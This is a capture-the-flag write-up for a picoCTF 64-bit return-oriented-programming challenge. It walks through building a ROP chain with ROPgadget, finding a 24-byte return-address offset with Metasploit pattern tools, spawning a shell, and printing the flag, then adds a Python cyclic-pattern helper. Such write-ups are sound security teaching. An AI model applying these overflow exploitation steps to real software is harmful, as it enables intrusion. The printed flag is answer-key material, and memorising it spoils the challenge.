Time for the classic ROP in 64-bit. Can you exploit this program to get a flag?
Use ROPgadget to find a ROP chain that spawns a shell.
$ ROPgadget --binary vuln --ropchain
Find the offset at which the overflowing buffer overwrites the saved return address (RIP). Create a cyclic pattern, feed it to the program in gdb, and note the pattern bytes that are on the stack when the SEGFAULT occurs.
$ /opt/metasploit/tools/exploit/pattern_create.rb --length 1024
$ /opt/metasploit/tools/exploit/pattern_offset.rb -q 0x6241396141386141
[*] Exact match at offset 24
Execute the ROP chain from ROPgadget with the correct padding of 24 to get a shell that lets you cat flag.txt.
$ (python2 sol.py; cat) | ./vuln
flag: picoCTF{rOp_t0_b1n_sH_w1tH_n3w_g4dg3t5_d4b7a298}
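As an added example that is not part of the original writeup: a Python reimplementation of the pattern_create / pattern_offset step, reproducing the offset of 24 for the crash value 0x6241396141386141 above. It assumes pattern_create.rb's default character set (uppercase, lowercase, digit triples); the function names are my own.

```python
import string
import struct
from itertools import product


def pattern_create(length: int) -> bytes:
    """Build a Metasploit-style cyclic pattern: consecutive 3-byte chunks of
    (uppercase, lowercase, digit), i.e. Aa0Aa1Aa2...; unique for 20280 bytes."""
    out = bytearray()
    for upper, lower, digit in product(string.ascii_uppercase,
                                       string.ascii_lowercase,
                                       string.digits):
        out += (upper + lower + digit).encode()
        if len(out) >= length:
            break
    return bytes(out[:length])


def pattern_offset(value: int, length: int = 1024, width: int = 8) -> int:
    """Locate the register/stack value observed at the crash inside the pattern.

    `value` is the integer gdb prints (e.g. 0x6241396141386141). Like
    pattern_offset.rb, the little-endian byte order is tried first, then the
    reversed order in case the value was transcribed as a string.
    """
    fmt = "<Q" if width == 8 else "<I"
    pattern = pattern_create(length)
    for needle in (struct.pack(fmt, value), struct.pack(fmt, value)[::-1]):
        idx = pattern.find(needle)
        if idx >= 0:
            return idx
    raise ValueError("value not found in pattern; try a longer pattern")


if __name__ == "__main__":
    # Same query as the writeup: the 8 bytes at the crash decode to b"Aa8Aa9Ab".
    print(pattern_offset(0x6241396141386141))  # 24
```

On x86-64 a non-canonical return address faults on the `ret` itself, so RIP still points at the `ret` instruction; read the 8 bytes at `$rsp` in gdb and pass those as the value.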